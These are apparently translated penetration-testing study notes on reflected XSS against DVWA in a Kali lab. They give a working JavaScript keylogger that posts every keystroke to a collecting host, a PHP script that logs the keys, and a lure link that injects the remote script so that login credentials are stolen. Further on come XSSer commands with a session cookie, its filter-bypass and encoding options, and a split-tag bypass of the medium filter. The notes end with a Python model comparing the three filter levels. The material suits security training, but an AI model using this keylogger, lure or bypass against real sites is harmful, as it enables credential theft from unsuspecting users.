In principle: as long as an XSS vulnerability exists, JavaScript with any functionality can be injected.
【Exploiting a reflected XSS vulnerability】
Keylogger: the recorded keystrokes are sent to a URL chosen by the attacker.
Server: Kali; client
Start the apache2 service: service apache2 start
Syntax:
keylogger.js
document.onkeypress = function(evt) {
    // Fires on every key press; fall back to window.event for old browsers
    evt = evt || window.event;
    var key = String.fromCharCode(evt.charCode);
    if (key) {
        // POST the captured character to the collecting server
        var http = new XMLHttpRequest();
        var param = encodeURI(key);
        http.open("POST", "http://192.168.1.127/keylogger.php", true);
        http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        http.send("key=" + param);
    }
}
keylogger.php 【receives the data submitted by the client】
<?php
// Append each submitted key to keylog.txt
$key = $_POST['key'];
$logfile = "keylog.txt";
$fp = fopen($logfile, "a");
fwrite($fp, $key);
fclose($fp);
?>
To avoid arousing the user's suspicion, the redirect can be placed in an HTML file.
Prerequisite: the user is already logged in to the website, so a session cookie exists and can be obtained.
# Forge an enticing link (e.g. a limited-time sale on tickets or phones) that leads to the page containing the XSS vulnerability 【the main harm is on login pages】 in order to steal the user's login credentials.
a.html
<a href="http://192.168.1.107/dvwa/vulnerabilities/xss_r/?name=<script+src='http://192.168.56.102/keylogger.js'></script>">Enticing text</a>
XSS exploitation tools
XSSer 【dedicated to XSS vulnerabilities; written in Python】
A graphical interface is available: xsser --gtk 【not recommended; the interface is not user-friendly】
It can bypass server-side input filtering 【XSS is extremely common】
1. Encoding: decimal / hexadecimal
2. Function: unescape()
Basic usage: xsser -u "http://192.168.56.101/dvwa/vulnerabilities/" -g "xss_r/?name=" --cookie="security=low; PHPSESSID=31677b04bc31eac6cd78dbb1922e8028" -s -v --reverse-check
【GET: put the page and its parameter in the -g option; POST: use -P; -s: count the requests; -v: verbose output; --reverse-check: do not verify by submitting a hash value (that method produces false positives)】
--heuristic: probe the server to find out which characters are filtered (sends a large number of requests) {the same idea applies to SQL} 【every filtering mechanism is based on filtering characters】
Encode the payload to bypass server-side filtering 【too much encoding may change the meaning of the payload】
*Select Bypasser(s)*:
These options can be used to encode selected vector(s) to try to
bypass possible anti-XSS filters on target(s) code and possible IPS
rules, if the target use it. Also, can be combined with other
techniques to provide encoding:

--Str Use method String.FromCharCode()
--Une Use Unescape() function
--Mix Mix String.FromCharCode() and Unescape()
--Dec Use Decimal encoding
--Hex Use Hexadecimal encoding
--Hes Use Hexadecimal encoding, with semicolons
--Dwo Encode vectors IP addresses in DWORD
--Doo Encode vectors IP addresses in Octal
--Cem=CEM Try -manually- different Character Encoding Mutations
(reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')
Injection techniques
*Special Technique(s)*:
These options can be used to try to inject code using different type
of XSS techniques. You can choose multiple:

--Coo COO - Cross Site Scripting Cookie injection
--Xsa XSA - Cross Site Agent Scripting
--Xsr XSR - Cross Site Referer Scripting
--Dcp DCP - Data Control Protocol injections
--Dom DOM - Document Object Model injections
--Ind IND - HTTP Response Splitting Induced code
--Anchor ANC - Use Anchor Stealth payloader (DOM shadows!)
--Phpids PHP - Exploit PHPIDS bug (0.6.5) to bypass filters

*Select Final injection(s)*:
These options can be used to specify the final code to inject in
vulnerable target(s). Important, if you want to exploit on-the-wild
your discovered vulnerabilities. Choose only one option:

--Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually-
--Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotelly-
--Doss DOSs - XSS Denial of service (server) injection
--Dos DOS - XSS Denial of service (client) injection
--B64 B64 - Base64 code encoding in META tag (rfc2397)

*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in
vulnerable target(s). You can select multiple and combine with your
final code (except with DCP code):

--Onm ONM - Use onMouseMove() event to inject code
--Ifr IFR - Use <iframe> source tag to inject code
Source code analysis
Low security level 【$_GET[]: the input is echoed back directly without any filtering】
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

    $isempty = true;

} else {

    echo '<pre>';
    echo 'Hello ' . $_GET['name'];
    echo '</pre>';

}

?>
Medium security level 【at output time, <script> is replaced with an empty string; the tag can be split and reassembled, e.g. <scr<script>ipt> becomes <script> after the replacement】
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

    $isempty = true;

} else {

    echo '<pre>';
    echo 'Hello ' . str_replace('<script>', '', $_GET['name']);
    echo '</pre>';

}

?>
High security level 【htmlspecialchars(): HTML-encodes the output; currently the most effective method (not completely unbypassable: contexts that need no angle brackets, such as inside <a href=>, are not covered)】 {Burp Suite can be used to perform the encoding}
<?php

if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){

    $isempty = true;

} else {

    echo '<pre>';
    echo 'Hello ' . htmlspecialchars($_GET['name']);
    echo '</pre>';

}

?>
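The three handlers compared side by side, as an added example that is not DVWA's own code: a Python model of the low, medium and high filters (assuming str.replace and html.escape stand in for PHP's str_replace and htmlspecialchars), run over constructed inputs including the split-tag case above, with a small check for whether a script element survives in the rendered page. It models the text-node context only; the attribute-context caveat above (e.g. href) is outside what html.escape addresses.

```python
import html

# Python model of the three DVWA xss_r handlers quoted above.
# Assumption: str.replace and html.escape behave like PHP's
# str_replace and htmlspecialchars for these inputs.

def render_low(name: str) -> str:
    # Low: input is echoed verbatim into the page.
    return "<pre>Hello " + name + "</pre>"

def render_medium(name: str) -> str:
    # Medium: single-pass, case-sensitive removal of the literal '<script>'.
    # Removing a substring is not sanitising: the remaining characters
    # are still interpreted as markup by the browser.
    return "<pre>Hello " + name.replace("<script>", "") + "</pre>"

def render_high(name: str) -> str:
    # High: output encoding. '<', '>', '&' and quotes become entities,
    # so the browser treats the whole value as text, never as a tag.
    return "<pre>Hello " + html.escape(name, quote=True) + "</pre>"

def contains_executable_script(page: str) -> bool:
    # Minimal detection check: does a real <script> element survive in
    # the rendered HTML? (Case-insensitive, as a browser parses tags.)
    return "<script" in page.lower()

# Constructed probe inputs (not taken from any real target).
PROBES = {
    "plain":  "Alice",
    "direct": "<script>alert(1)</script>",
    "split":  "<scr<script>ipt>alert(1)</script>",  # the split-tag case from the text
}

def survey() -> dict:
    # For each level, list the probe names whose output still carries a script element.
    levels = (("low", render_low), ("medium", render_medium), ("high", render_high))
    return {level: [n for n, v in PROBES.items() if contains_executable_script(render(v))]
            for level, render in levels}

if __name__ == "__main__":
    for level, hits in survey().items():
        print(f"{level:6s}: script element survives for {hits or 'none'}")
```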